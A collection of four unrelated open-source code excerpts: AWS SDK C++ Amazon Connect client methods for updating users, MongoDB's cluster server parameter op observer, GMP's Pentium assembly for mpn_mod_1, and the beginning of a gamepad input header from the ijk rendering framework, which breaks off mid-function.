return UpdateUserPhoneConfigOutcome(Aws::Client::AWSError<ConnectErrors>(ConnectErrors::MISSING_PARAMETER, "MISSING_PARAMETER", "Missing required field [UserId]", false));
}
if (!request.InstanceIdHasBeenSet())
{
AWS_LOGSTREAM_ERROR("UpdateUserPhoneConfig", "Required field: InstanceId, is not set");
return UpdateUserPhoneConfigOutcome(Aws::Client::AWSError<ConnectErrors>(ConnectErrors::MISSING_PARAMETER, "MISSING_PARAMETER", "Missing required field [InstanceId]", false));
}
Aws::Http::URI uri = m_uri;
Aws::StringStream ss;
ss << "/users/";
ss << request.GetInstanceId();
ss << "/";
ss << request.GetUserId();
ss << "/phone-config";
uri.SetPath(uri.GetPath() + ss.str());
JsonOutcome outcome = MakeRequest(uri, request, Aws::Http::HttpMethod::HTTP_POST, Aws::Auth::SIGV4_SIGNER);
if(outcome.IsSuccess())
{
return UpdateUserPhoneConfigOutcome(NoResult());
}
else
{
return UpdateUserPhoneConfigOutcome(outcome.GetError());
}
}
UpdateUserPhoneConfigOutcomeCallable ConnectClient::UpdateUserPhoneConfigCallable(const UpdateUserPhoneConfigRequest& request) const
{
auto task = Aws::MakeShared< std::packaged_task< UpdateUserPhoneConfigOutcome() > >(ALLOCATION_TAG, [this, request](){ return this->UpdateUserPhoneConfig(request); } );
auto packagedFunction = [task]() { (*task)(); };
m_executor->Submit(packagedFunction);
return task->get_future();
}
void ConnectClient::UpdateUserPhoneConfigAsync(const UpdateUserPhoneConfigRequest& request, const UpdateUserPhoneConfigResponseReceivedHandler& handler, const std::shared_ptr<const Aws::Client::AsyncCallerContext>& context) const
{
m_executor->Submit( [this, request, handler, context](){ this->UpdateUserPhoneConfigAsyncHelper( request, handler, context ); } );
}
void ConnectClient::UpdateUserPhoneConfigAsyncHelper(const UpdateUserPhoneConfigRequest& request, const UpdateUserPhoneConfigResponseReceivedHandler& handler, const std::shared_ptr<const Aws::Client::AsyncCallerContext>& context) const
{
handler(this, request, UpdateUserPhoneConfig(request), context);
}
UpdateUserRoutingProfileOutcome ConnectClient::UpdateUserRoutingProfile(const UpdateUserRoutingProfileRequest& request) const
{
if (!request.UserIdHasBeenSet())
{
AWS_LOGSTREAM_ERROR("UpdateUserRoutingProfile", "Required field: UserId, is not set");
return UpdateUserRoutingProfileOutcome(Aws::Client::AWSError<ConnectErrors>(ConnectErrors::MISSING_PARAMETER, "MISSING_PARAMETER", "Missing required field [UserId]", false));
}
if (!request.InstanceIdHasBeenSet())
{
AWS_LOGSTREAM_ERROR("UpdateUserRoutingProfile", "Required field: InstanceId, is not set");
return UpdateUserRoutingProfileOutcome(Aws::Client::AWSError<ConnectErrors>(ConnectErrors::MISSING_PARAMETER, "MISSING_PARAMETER", "Missing required field [InstanceId]", false));
}
Aws::Http::URI uri = m_uri;
Aws::StringStream ss;
ss << "/users/";
ss << request.GetInstanceId();
ss << "/";
ss << request.GetUserId();
ss << "/routing-profile";
uri.SetPath(uri.GetPath() + ss.str());
JsonOutcome outcome = MakeRequest(uri, request, Aws::Http::HttpMethod::HTTP_POST, Aws::Auth::SIGV4_SIGNER);
if(outcome.IsSuccess())
{
return UpdateUserRoutingProfileOutcome(NoResult());
}
else
{
return UpdateUserRoutingProfileOutcome(outcome.GetError());
}
}
UpdateUserRoutingProfileOutcomeCallable ConnectClient::UpdateUserRoutingProfileCallable(const UpdateUserRoutingProfileRequest& request) const
{
auto task = Aws::MakeShared< std::packaged_task< UpdateUserRoutingProfileOutcome() > >(ALLOCATION_TAG, [this, request](){ return this->UpdateUserRoutingProfile(request); } );
auto packagedFunction = [task]() { (*task)(); };
m_executor->Submit(packagedFunction);
return task->get_future();
}
void ConnectClient::UpdateUserRoutingProfileAsync(const UpdateUserRoutingProfileRequest& request, const UpdateUserRoutingProfileResponseReceivedHandler& handler, const std::shared_ptr<const Aws::Client::AsyncCallerContext>& context) const
{
m_executor->Submit( [this, request, handler, context](){ this->UpdateUserRoutingProfileAsyncHelper( request, handler, context ); } );
}
void ConnectClient::UpdateUserRoutingProfileAsyncHelper(const UpdateUserRoutingProfileRequest& request, const UpdateUserRoutingProfileResponseReceivedHandler& handler, const std::shared_ptr<const Aws::Client::AsyncCallerContext>& context) const
{
handler(this, request, UpdateUserRoutingProfile(request), context);
}
UpdateUserSecurityProfilesOutcome ConnectClient::UpdateUserSecurityProfiles(const UpdateUserSecurityProfilesRequest& request) const
{
if (!request.UserIdHasBeenSet())
{
AWS_LOGSTREAM_ERROR("UpdateUserSecurityProfiles", "Required field: UserId, is not set");
return UpdateUserSecurityProfilesOutcome(Aws::Client::AWSError<ConnectErrors>(ConnectErrors::MISSING_PARAMETER, "MISSING_PARAMETER", "Missing required field [UserId]", false));
}
if (!request.InstanceIdHasBeenSet())
{
AWS_LOGSTREAM_ERROR("UpdateUserSecurityProfiles", "Required field: InstanceId, is not set");
return UpdateUserSecurityProfilesOutcome(Aws::Client::AWSError<ConnectErrors>(ConnectErrors::MISSING_PARAMETER, "MISSING_PARAMETER", "Missing required field [InstanceId]", false));
}
Aws::Http::URI uri = m_uri;
Aws::StringStream ss;
ss << "/users/";
ss << request.GetInstanceId();
ss << "/";
ss << request.GetUserId();
ss << "/security-profiles";
uri.SetPath(uri.GetPath() + ss.str());
JsonOutcome outcome = MakeRequest(uri, request, Aws::Http::HttpMethod::HTTP_POST, Aws::Auth::SIGV4_SIGNER);
if(outcome.IsSuccess())
{
return UpdateUserSecurityProfilesOutcome(NoResult());
}
else
{
return UpdateUserSecurityProfilesOutcome(outcome.GetError());
}
}
UpdateUserSecurityProfilesOutcomeCallable ConnectClient::UpdateUserSecurityProfilesCallable(const UpdateUserSecurityProfilesRequest& request) const
{
auto task = Aws::MakeShared< std::packaged_task< UpdateUserSecurityProfilesOutcome() > >(ALLOCATION_TAG, [this, request](){ return this->UpdateUserSecurityProfiles(request); } );
auto packagedFunction = [task]() { (*task)(); };
m_executor->Submit(packagedFunction);
return task->get_future();
}
void ConnectClient::UpdateUserSecurityProfilesAsync(const UpdateUserSecurityProfilesRequest& request, const UpdateUserSecurityProfilesResponseReceivedHandler& handler, const std::shared_ptr<const Aws::Client::AsyncCallerContext>& context) const
{
m_executor->Submit( [this, request, handler, context](){ this->UpdateUserSecurityProfilesAsyncHelper( request, handler, context ); } );
}
void ConnectClient::UpdateUserSecurityProfilesAsyncHelper(const UpdateUserSecurityProfilesRequest& request, const UpdateUserSecurityProfilesResponseReceivedHandler& handler, const std::shared_ptr<const Aws::Client::AsyncCallerContext>& context) const
{
handler(this, request, UpdateUserSecurityProfiles(request), context);
}
|
/**
* Copyright (C) 2022-present MongoDB, Inc.
*
* This program is free software: you can redistribute it and/or modify
* it under the terms of the Server Side Public License, version 1,
* as published by MongoDB, Inc.
*
* This program is distributed in the hope that it will be useful,
* but WITHOUT ANY WARRANTY; without even the implied warranty of
* MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
* Server Side Public License for more details.
*
* You should have received a copy of the Server Side Public License
* along with this program. If not, see
* <http://www.mongodb.com/licensing/server-side-public-license>.
*
* As a special exception, the copyright holders give permission to link the
* code of portions of this program with the OpenSSL library under certain
* conditions as described in each individual source file and distribute
* linked combinations including the program with the OpenSSL library. You
* must comply with the Server Side Public License in all respects for
* all of the code used other than as permitted herein. If you modify file(s)
* with this exception, you may extend this exception to your version of the
* file(s), but you are not obligated to do so. If you do not wish to do so,
* delete this exception statement from your version. If you delete this
* exception statement from all source files in the program, then also delete
* it in the license file.
*/
#include "mongo/idl/cluster_server_parameter_op_observer.h"
#include <memory>
#include "mongo/db/dbdirectclient.h"
#include "mongo/logv2/log.h"
#define MONGO_LOGV2_DEFAULT_COMPONENT ::mongo::logv2::LogComponent::kControl
namespace mongo {
namespace {
constexpr auto kIdField = "_id"_sd;
constexpr auto kCPTField = "clusterParameterTime"_sd;
/**
* Per-operation scratch space indicating the document being deleted.
* This is used in the aboutToDelete/onDelete handlers since the document
* is not necessarily available in the latter.
*/
const auto aboutToDeleteDoc = OperationContext::declareDecoration<std::string>();
bool isConfigNamespace(const NamespaceString& nss) {
return nss == NamespaceString::kClusterParametersNamespace;
}
constexpr auto kOplog = "oplog"_sd;
void updateParameter(BSONObj doc, StringData mode) {
auto nameElem = doc[kIdField];
if (nameElem.type() != String) {
LOGV2_DEBUG(6226301,
1,
"Update with invalid cluster server parameter name",
"mode"_attr = mode,
"_id"_attr = nameElem);
return;
}
auto name = doc[kIdField].valueStringData();
auto* sp = ServerParameterSet::getClusterParameterSet()->getIfExists(name);
if (!sp) {
LOGV2_DEBUG(6226300,
3,
"Update to unknown cluster server parameter",
"mode"_attr = mode,
"name"_attr = name);
return;
}
auto cptElem = doc[kCPTField];
if ((cptElem.type() != mongo::Date) && (cptElem.type() != bsonTimestamp)) {
LOGV2_DEBUG(6226302,
1,
"Update to cluster server parameter has invalid clusterParameterTime",
"mode"_attr = mode,
"name"_attr = name,
"clusterParameterTime"_attr = cptElem);
return;
}
uassertStatusOK(sp->set(doc));
}
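// Illustrative shape of a document accepted by updateParameter() above; the
// payload fields beyond _id and clusterParameterTime are parameter-specific:
//   { _id: "someClusterParameter", clusterParameterTime: Timestamp(...), ... }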
void clearParameter(ServerParameter* sp) {
if (sp->getClusterParameterTime() == LogicalTime::kUninitialized) {
// Nothing to clear.
return;
}
uassertStatusOK(sp->reset());
}
void clearParameter(StringData id) {
auto* sp = ServerParameterSet::getClusterParameterSet()->getIfExists(id);
if (!sp) {
LOGV2_DEBUG(6226303,
5,
"oplog event deletion of unknown cluster server parameter",
"name"_attr = id);
return;
}
clearParameter(sp);
}
void clearAllParameters() {
const auto& params = ServerParameterSet::getClusterParameterSet()->getMap();
for (const auto& it : params) {
clearParameter(it.second);
}
}
template <typename OnEntry>
void doLoadAllParametersFromDisk(OperationContext* opCtx, StringData mode, OnEntry onEntry) try {
std::vector<Status> failures;
DBDirectClient client(opCtx);
FindCommandRequest findRequest{NamespaceString::kClusterParametersNamespace};
client.find(std::move(findRequest), ReadPreferenceSetting{}, [&](BSONObj doc) {
try {
onEntry(doc, mode);
} catch (const DBException& ex) {
failures.push_back(ex.toStatus());
}
});
if (!failures.empty()) {
StringBuilder msg;
for (const auto& failure : failures) {
msg << failure.toString() << ", ";
}
msg.reset(msg.len() - 2);
uasserted(ErrorCodes::OperationFailed, msg.str());
}
} catch (const DBException& ex) {
uassertStatusOK(ex.toStatus().withContext(
str::stream() << "Failed " << mode << " cluster server parameters from disk"));
}
/**
* Used on rollback and rename with drop.
* Updates settings which are present and clears settings which are not.
*/
void resynchronizeAllParametersFromDisk(OperationContext* opCtx) {
const auto& allParams = ServerParameterSet::getClusterParameterSet()->getMap();
std::set<std::string> unsetSettings;
for (const auto& it : allParams) {
unsetSettings.insert(it.second->name());
}
doLoadAllParametersFromDisk(
opCtx, "resynchronizing"_sd, [&unsetSettings](BSONObj doc, StringData mode) {
unsetSettings.erase(doc[kIdField].str());
updateParameter(doc, mode);
});
// For all known settings which were not present in this resync,
// explicitly clear any value which may be present in-memory.
for (const auto& setting : unsetSettings) {
clearParameter(setting);
}
}
} // namespace
void ClusterServerParameterOpObserver::initializeAllParametersFromDisk(OperationContext* opCtx) {
doLoadAllParametersFromDisk(opCtx, "initializing"_sd, updateParameter);
}
void ClusterServerParameterOpObserver::onInserts(OperationContext* opCtx,
const NamespaceString& nss,
const UUID& uuid,
std::vector<InsertStatement>::const_iterator first,
std::vector<InsertStatement>::const_iterator last,
bool fromMigrate) {
if (!isConfigNamespace(nss)) {
return;
}
for (auto it = first; it != last; ++it) {
updateParameter(it->doc, kOplog);
}
}
void ClusterServerParameterOpObserver::onUpdate(OperationContext* opCtx,
const OplogUpdateEntryArgs& args) {
auto updatedDoc = args.updateArgs->updatedDoc;
if (!isConfigNamespace(args.nss) || args.updateArgs->update.isEmpty()) {
return;
}
updateParameter(updatedDoc, kOplog);
}
void ClusterServerParameterOpObserver::aboutToDelete(OperationContext* opCtx,
const NamespaceString& nss,
const UUID& uuid,
const BSONObj& doc) {
std::string docBeingDeleted;
if (isConfigNamespace(nss)) {
auto elem = doc[kIdField];
if (elem.type() == String) {
docBeingDeleted = elem.str();
} else {
// This delete makes no sense,
// but it's safe to ignore since the insert/update
// would not have resulted in an in-memory update anyway.
LOGV2_DEBUG(6226304,
3,
"Deleting a cluster-wide server parameter with non-string name",
"name"_attr = elem);
}
}
// Stash the name of the config doc being deleted (if any)
// in an opCtx decoration for use in the onDelete() hook below
// since OplogDeleteEntryArgs isn't guaranteed to have the deleted doc.
aboutToDeleteDoc(opCtx) = std::move(docBeingDeleted);
}
void ClusterServerParameterOpObserver::onDelete(OperationContext* opCtx,
const NamespaceString& nss,
const UUID& uuid,
StmtId stmtId,
const OplogDeleteEntryArgs& args) {
const auto& docName = aboutToDeleteDoc(opCtx);
if (!docName.empty()) {
clearParameter(docName);
}
}
void ClusterServerParameterOpObserver::onDropDatabase(OperationContext* opCtx,
const std::string& dbName) {
if (dbName == NamespaceString::kConfigDb) {
// Entire config DB deleted, reset to default state.
clearAllParameters();
}
}
repl::OpTime ClusterServerParameterOpObserver::onDropCollection(
OperationContext* opCtx,
const NamespaceString& collectionName,
const UUID& uuid,
std::uint64_t numRecords,
CollectionDropType dropType) {
if (isConfigNamespace(collectionName)) {
// Entire collection deleted, reset to default state.
clearAllParameters();
}
return {};
}
void ClusterServerParameterOpObserver::postRenameCollection(
OperationContext* opCtx,
const NamespaceString& fromCollection,
const NamespaceString& toCollection,
const UUID& uuid,
const boost::optional<UUID>& dropTargetUUID,
bool stayTemp) {
if (isConfigNamespace(fromCollection)) {
// Same as collection dropped from a config point of view.
clearAllParameters();
}
if (isConfigNamespace(toCollection)) {
// Potentially many documents now set, perform full scan.
if (dropTargetUUID) {
// Possibly lost configurations in overwrite.
resynchronizeAllParametersFromDisk(opCtx);
} else {
// Collection did not exist prior to rename.
initializeAllParametersFromDisk(opCtx);
}
}
}
void ClusterServerParameterOpObserver::onImportCollection(OperationContext* opCtx,
const UUID& importUUID,
const NamespaceString& nss,
long long numRecords,
long long dataSize,
const BSONObj& catalogEntry,
const BSONObj& storageMetadata,
bool isDryRun) {
if (!isDryRun && (numRecords > 0) && isConfigNamespace(nss)) {
// Something was imported, do a full collection scan to sync up.
// No need to apply rollback rules since nothing will have been deleted.
initializeAllParametersFromDisk(opCtx);
}
}
void ClusterServerParameterOpObserver::_onReplicationRollback(OperationContext* opCtx,
const RollbackObserverInfo& rbInfo) {
if (rbInfo.rollbackNamespaces.count(NamespaceString::kClusterParametersNamespace)) {
// Some kind of rollback happened in the settings collection.
// Just reload from disk to be safe.
resynchronizeAllParametersFromDisk(opCtx);
}
}
} // namespace mongo
|
dnl Intel P5 mpn_mod_1 -- mpn by limb remainder.
dnl Copyright 1999, 2000, 2002 Free Software Foundation, Inc.
dnl
dnl This file is part of the GNU MP Library.
dnl
dnl The GNU MP Library is free software; you can redistribute it and/or
dnl modify it under the terms of the GNU Lesser General Public License as
dnl published by the Free Software Foundation; either version 3 of the
dnl License, or (at your option) any later version.
dnl
dnl The GNU MP Library is distributed in the hope that it will be useful,
dnl but WITHOUT ANY WARRANTY; without even the implied warranty of
dnl MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
dnl Lesser General Public License for more details.
dnl
dnl You should have received a copy of the GNU Lesser General Public License
dnl along with the GNU MP Library. If not, see http://www.gnu.org/licenses/.
include(`../config.m4')
C P5: 28.0 cycles/limb
C mp_limb_t mpn_mod_1 (mp_srcptr src, mp_size_t size, mp_limb_t divisor);
C mp_limb_t mpn_mod_1c (mp_srcptr src, mp_size_t size, mp_limb_t divisor,
C mp_limb_t carry);
C mp_limb_t mpn_preinv_mod_1 (mp_srcptr src, mp_size_t size, mp_limb_t divisor,
C mp_limb_t inverse);
C
C This code is not unlike mpn/x86/p6/mod_1.asm, it does the same sort of
C multiply by inverse without on-the-fly shifts. See that code for some
C general comments.
C
C Alternatives:
C
C P5 shldl is 4 cycles, so shifting on the fly would be at least 5 cycles
C slower, probably more depending what it did to register usage. Using MMX
C on P55 would be better, but still at least 4 or 5 instructions and so 2 or
C 3 cycles.
dnl These thresholds are the sizes where the multiply by inverse method is
dnl used, rather than plain "divl"s. Minimum value 2.
dnl
dnl MUL_NORM_THRESHOLD is for an already normalized divisor (high bit set),
dnl MUL_UNNORM_THRESHOLD for an unnormalized divisor.
dnl
dnl With the divl loop at 44 c/l and the inverse at 28 c/l with about 70
dnl cycles to setup, the threshold should be about ceil(70/16)==5, which is
dnl what happens in practice.
dnl
dnl An unnormalized divisor gets an extra 40 cycles at the end for the
dnl final (r*2^n)%(d*2^n) and shift. This increases the threshold by about
dnl 40/16=3.
dnl
dnl PIC adds between 4 and 7 cycles (not sure why it varies), but this
dnl doesn't change the thresholds.
dnl
dnl The entry sequence code that chooses between MUL_NORM_THRESHOLD and
dnl MUL_UNNORM_THRESHOLD is a bit horrible, but it adds only 2 cycles
dnl (branch free) and ensures the choice between div or mul is optimal.
deflit(MUL_NORM_THRESHOLD, ifdef(`PIC',5,5))
deflit(MUL_UNNORM_THRESHOLD, ifdef(`PIC',8,8))
deflit(MUL_NORM_DELTA, eval(MUL_NORM_THRESHOLD - MUL_UNNORM_THRESHOLD))
defframe(PARAM_INVERSE, 16) dnl mpn_preinv_mod_1
defframe(PARAM_CARRY, 16) dnl mpn_mod_1c
defframe(PARAM_DIVISOR, 12)
defframe(PARAM_SIZE, 8)
defframe(PARAM_SRC, 4)
dnl re-using parameter space
define(VAR_NORM, `PARAM_DIVISOR')
define(VAR_INVERSE, `PARAM_SIZE')
TEXT
ALIGN(8)
PROLOGUE(mpn_preinv_mod_1)
deflit(`FRAME',0)
pushl %ebp FRAME_pushl()
pushl %esi FRAME_pushl()
movl PARAM_SRC, %esi
movl PARAM_SIZE, %edx
pushl %edi FRAME_pushl()
pushl %ebx FRAME_pushl()
movl PARAM_DIVISOR, %ebp
movl PARAM_INVERSE, %eax
movl -4(%esi,%edx,4), %edi C src high limb
leal -8(%esi,%edx,4), %esi C &src[size-2]
movl $0, VAR_NORM
decl %edx
jnz L(start_preinv)
subl %ebp, %edi C src-divisor
popl %ebx
sbbl %ecx, %ecx C -1 if underflow
movl %edi, %eax C src-divisor
andl %ebp, %ecx C d if underflow
popl %edi
addl %ecx, %eax C remainder, with possible addback
popl %esi
popl %ebp
ret
EPILOGUE()
ALIGN(8)
PROLOGUE(mpn_mod_1c)
deflit(`FRAME',0)
movl PARAM_DIVISOR, %eax
movl PARAM_SIZE, %ecx
sarl $31, %eax C d highbit
movl PARAM_CARRY, %edx
orl %ecx, %ecx
jz L(done_edx) C result==carry if size==0
andl $MUL_NORM_DELTA, %eax
pushl %ebp FRAME_pushl()
addl $MUL_UNNORM_THRESHOLD, %eax C norm or unnorm thresh
pushl %esi FRAME_pushl()
movl PARAM_SRC, %esi
movl PARAM_DIVISOR, %ebp
cmpl %eax, %ecx
jb L(divide_top)
movl %edx, %eax C carry as pretend src high limb
leal 1(%ecx), %edx C size+1
cmpl $0x1000000, %ebp
jmp L(mul_by_inverse_1c)
EPILOGUE()
ALIGN(8)
PROLOGUE(mpn_mod_1)
deflit(`FRAME',0)
movl PARAM_SIZE, %ecx
pushl %ebp FRAME_pushl()
orl %ecx, %ecx
jz L(done_zero)
movl PARAM_SRC, %eax
movl PARAM_DIVISOR, %ebp
sarl $31, %ebp C -1 if divisor normalized
movl -4(%eax,%ecx,4), %eax C src high limb
movl PARAM_DIVISOR, %edx
pushl %esi FRAME_pushl()
andl $MUL_NORM_DELTA, %ebp
cmpl %edx, %eax C carry flag if high<divisor
sbbl %edx, %edx C -1 if high<divisor
addl $MUL_UNNORM_THRESHOLD, %ebp C norm or unnorm thresh
addl %edx, %ecx C size-1 if high<divisor
jz L(done_eax)
cmpl %ebp, %ecx
movl PARAM_DIVISOR, %ebp
movl PARAM_SRC, %esi
jae L(mul_by_inverse)
andl %eax, %edx C high as initial carry if high<divisor
L(divide_top):
C eax scratch (quotient)
C ebx
C ecx counter, limbs, decrementing
C edx scratch (remainder)
C esi src
C edi
C ebp divisor
movl -4(%esi,%ecx,4), %eax
divl %ebp
decl %ecx
jnz L(divide_top)
popl %esi
popl %ebp
L(done_edx):
movl %edx, %eax
ret
L(done_zero):
xorl %eax, %eax
popl %ebp
ret
C -----------------------------------------------------------------------------
C
C The divisor is normalized using the same code as the pentium
C count_leading_zeros in longlong.h. Going through the GOT for PIC costs a
C couple of cycles, but is more or less unavoidable.
ALIGN(8)
L(mul_by_inverse):
C eax src high limb
C ebx
C ecx size or size-1
C edx
C esi src
C edi
C ebp divisor
movl PARAM_SIZE, %edx
cmpl $0x1000000, %ebp
L(mul_by_inverse_1c):
sbbl %ecx, %ecx
cmpl $0x10000, %ebp
sbbl $0, %ecx
cmpl $0x100, %ebp
sbbl $0, %ecx
pushl %edi FRAME_pushl()
pushl %ebx FRAME_pushl()
movl %ebp, %ebx C d
ifdef(`PIC',`
call L(here)
L(here):
popl %edi
leal 25(,%ecx,8), %ecx C 0,-1,-2,-3 -> 25,17,9,1
shrl %cl, %ebx
addl $_GLOBAL_OFFSET_TABLE_+[.-L(here)], %edi
C AGI
movl __clz_tab@GOT(%edi), %edi
addl $-34, %ecx
C AGI
movb (%ebx,%edi), %bl
',`
leal 25(,%ecx,8), %ecx C 0,-1,-2,-3 -> 25,17,9,1
shrl %cl, %ebx
addl $-34, %ecx
C AGI
movb __clz_tab(%ebx), %bl
')
movl %eax, %edi C carry -> n1
addl %ebx, %ecx C -34 + c + __clz_tab[d>>c] = -clz-1
leal -8(%esi,%edx,4), %esi C &src[size-2]
xorl $-1, %ecx C clz
movl $-1, %edx
ASSERT(e,`pushl %eax C clz calculation same as bsrl
bsrl %ebp, %eax
xorl $31, %eax
cmpl %eax, %ecx
popl %eax')
shll %cl, %ebp C d normalized
movl %ecx, VAR_NORM
subl %ebp, %edx C (b-d)-1, so edx:eax = b*(b-d)-1
movl $-1, %eax
divl %ebp C floor (b*(b-d)-1) / d
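C Illustrative C model of the reciprocal just computed (not part of the
C build): with b=2^32 and d normalized, ~d:~0 equals b*(b-d)-1, so
C     inverse = (uint32_t) ((((uint64_t) ~d << 32) | 0xFFFFFFFF) / d);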
L(start_preinv):
movl %eax, VAR_INVERSE
movl %ebp, %eax C d
movl %ecx, %edx C fake high, will cancel
C For mpn_mod_1 and mpn_preinv_mod_1, the initial carry in %edi is the src
C high limb, and this may be greater than the divisor and may need one copy
C of the divisor subtracted (only one, because the divisor is normalized).
C This is accomplished by having the initial ecx:edi act as a fake previous
C n2:n10. The initial edx:eax is d, acting as a fake (q1+1)*d which is
C subtracted from ecx:edi, with the usual addback if it produces an
C underflow.
L(inverse_top):
C eax scratch (n10, n1, q1, etc)
C ebx scratch (nadj, src limit)
C ecx old n2
C edx scratch
C esi src pointer, &src[size-2] to &src[0]
C edi old n10
C ebp d
subl %eax, %edi C low n - (q1+1)*d
movl (%esi), %eax C new n10
sbbl %edx, %ecx C high n - (q1+1)*d, 0 or -1
movl %ebp, %ebx C d
sarl $31, %eax C -n1
andl %ebp, %ecx C d if underflow
addl %edi, %ecx C remainder -> n2, and possible addback
ASSERT(b,`cmpl %ebp, %ecx')
andl %eax, %ebx C -n1 & d
movl (%esi), %edi C n10
andl $1, %eax C n1
addl %ecx, %eax C n2+n1
addl %edi, %ebx C nadj = n10 + (-n1 & d), ignoring overflow
mull VAR_INVERSE C m*(n2+n1)
addl %eax, %ebx C low(m*(n2+n1) + nadj), giving carry flag
leal 1(%ecx), %eax C 1+n2
adcl %edx, %eax C 1 + high[n2<<32 + m*(n2+n1) + nadj] = q1+1
movl PARAM_SRC, %ebx
sbbl $0, %eax C use q1 if q1+1 overflows
subl $4, %esi C step src ptr
mull %ebp C (q1+1)*d
cmpl %ebx, %esi
jae L(inverse_top)
C %edi (after subtract and addback) is the remainder modulo d*2^n
C and must be reduced to 0<=r<d by calculating r*2^n mod d*2^n and
C right shifting by n.
C
C If d was already normalized on entry so that n==0 then nothing is
C needed here. This is always the case for preinv_mod_1. For mod_1
C or mod_1c the chance of n==0 is low, but about 40 cycles can be
C saved.
subl %eax, %edi C low n - (q1+1)*d
movl %ecx, %ebx C n2
sbbl %edx, %ebx C high n - (q1+1)*d, 0 or -1
xorl %esi, %esi C next n2
andl %ebp, %ebx C d if underflow
movl VAR_NORM, %ecx
addl %ebx, %edi C remainder, with possible addback
orl %ecx, %ecx
jz L(done_mul_edi)
C Here using %esi=n2 and %edi=n10, unlike the above
shldl( %cl, %edi, %esi) C n2
shll %cl, %edi C n10
movl %edi, %eax C n10
movl %edi, %ebx C n10
sarl $31, %ebx C -n1
shrl $31, %eax C n1
andl %ebp, %ebx C -n1 & d
addl %esi, %eax C n2+n1
addl %edi, %ebx C nadj = n10 + (-n1 & d), ignoring overflow
mull VAR_INVERSE C m*(n2+n1)
addl %eax, %ebx C m*(n2+n1) + nadj, low giving carry flag
leal 1(%esi), %eax C 1+n2
adcl %edx, %eax C 1 + high(n2<<32 + m*(n2+n1) + nadj) = q1+1
sbbl $0, %eax C use q1 if q1+1 overflows
mull %ebp C (q1+1)*d
subl %eax, %edi C low n - (q1+1)*d
popl %ebx
sbbl %edx, %esi C high n - (q1+1)*d, 0 or -1
movl %edi, %eax
andl %ebp, %esi C d if underflow
popl %edi
addl %esi, %eax C addback if underflow
popl %esi
shrl %cl, %eax C denorm remainder
popl %ebp
ret
L(done_mul_edi):
movl %edi, %eax
popl %ebx
popl %edi
L(done_eax):
popl %esi
popl %ebp
ret
EPILOGUE()
|
/*
Copyright 2020-2021 Daniel S. Buckstein
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
*/
/*
ijk: an open-source, cross-platform, light-weight,
c-based rendering framework
By Daniel S. Buckstein
ijkGamepad.inl
Gamepad/controller/handheld input device inline implementation.
*/
#ifdef _IJK_GAMEPAD_H_
#ifndef _IJK_GAMEPAD_INL_
#define _IJK_GAMEPAD_INL_
//-----------------------------------------------------------------------------
ijk_inl iret ijkGamepadGetButtonState(ijkGamepadState const* const gamepad, ibool state_out[1], ijkGamepadBtn const button)
{
if (gamepad && state_out)
{
*state_out = (ibool)ijk_flagch(gamepad->state.button, button);
return ijk_success;
}
return ijk_fail_invalidparams;
}
ijk_inl iret ijkGamepadIsButtonDown(ijkGamepadState const* const gamepad, ijkGamepadBtn const button)
{
if (gamepad)
{
return ijk_flagch(gamepad->state.button, button);
}
return ijk_fail_invalidparams;
}
ijk_inl iret ijkGamepadIsButtonUp(ijkGamepadState const* const gamepad, ijkGamepadBtn const button)
{
if (gamepad)
{
return ijk_flagnch(gamepad->state.button, button);
}
return ijk_fail_invalidparams;
}
ijk_inl iret ijkGamepadIsButtonDownAgain(ijkGamepadState const* const gamepad, ijkGamepadBtn const button)
{
if (gamepad)
{
return ijk_flagch(gamepad->button_downAgain, button);
}
return ijk_fail_invalidparams;
}
ijk_inl iret ijkGamepadIsButtonUpAgain(ijkGamepadState const* const gamepad, ijkGamepadBtn const button)
{
if (gamepad)
{
return ijk_flagnch(gamepad->button_upAgain, button);
}
return ijk_fail_invalidparams;
}
ijk_inl iret ijkGamepadIsButtonPressed(ijkGamepadState const* const gamepad, ijkGamepadBtn const button)
{
if (gamepad)
{
return ijk_flagch(gamepad->button_pressed, button);
}
return ijk_fail_invalidparams;
}
ijk_inl iret ijkGamepadIsButtonReleased(ijkGamepadState const* const gamepad, ijkGamepadBtn const button)
{
if (gamepad)
{
return ijk_flagch(gamepad->button_released, button);
}
return ijk_fail_invalidparams;
}
ijk_inl iret ijkGamepadGetConnectionState(ijkGamepadState const* const gamepad, ibool state_out[1])
{
if (gamepad && state_out)
{
*state_out = (ibool)ijk_istrue(gamepad->state.connected);
return ijk_success;
}
return ijk_fail_invalidparams;
}
ijk_inl iret ijkGamepadIsConnected(ijkGamepadState const* const gamepad)
{
if (gamepad)
{
return (gamepad->state.connected);
}
return ijk_fail_invalidparams;
}
ijk_inl iret ijkGamepadIsNotConnected(ijkGamepadState const* const gamepad)
{
if (gamepad)
{
return !(gamepad->state.connected);
}
return ijk_fail_invalidparams;
}
ijk_inl iret ijkGamepadIsConnectedAgain(ijkGamepadState const* const gamepad)
{
if (gamepad)
{
return (gamepad->state.connected && gamepad->state_prev.connected);
}
return ijk_fail_invalidparams;
}
ijk_inl iret ijkGamepadIsNotConnectedAgain(ijkGamepadState const* const gamepad)
{
if (gamepad)
{
return !(gamepad->state.connected || gamepad->state_prev.connected);
}
return ijk_fail_invalidparams;
}
ijk_inl iret ijkGamepadReconnected(ijkGamepadState const* const gamepad)
{
if (gamepad)
{
return (gamepad->state.connected && !gamepad->state_prev.connected);
}
return ijk_fail_invalidparams;
}
ijk_inl iret ijkGamepadDisconnected(ijkGamepadState const* const gamepad)
{
if (gamepad)
{
return (gamepad->state_prev.connected && !gamepad->state.connected);
}
return ijk_fail_invalidparams;
}
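// Usage sketch (illustrative, assuming the app updates gamepad state once per
// frame): the state/state_prev pair makes the edge queries fire once per
// transition, e.g.
//	if (gamepad && ijkGamepadReconnected(gamepad))
//		onGamepadAttached(gamepad);	// hypothetical app callback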
ijk_inl iret ijkGamepadGetTriggerLeft(ijkGamepadState const* const gamepad, dbl v_out[1])
{
if (gamepad && v_out)
{
*v_out = gamepad->state.trigger_left_unit;
return ijk_success;
}
return ijk_fail_invalidparams;
}
ijk_inl iret ijkGamepadGetTriggerRight(ijkGamepadState const* const gamepad, dbl v_out[1])
{
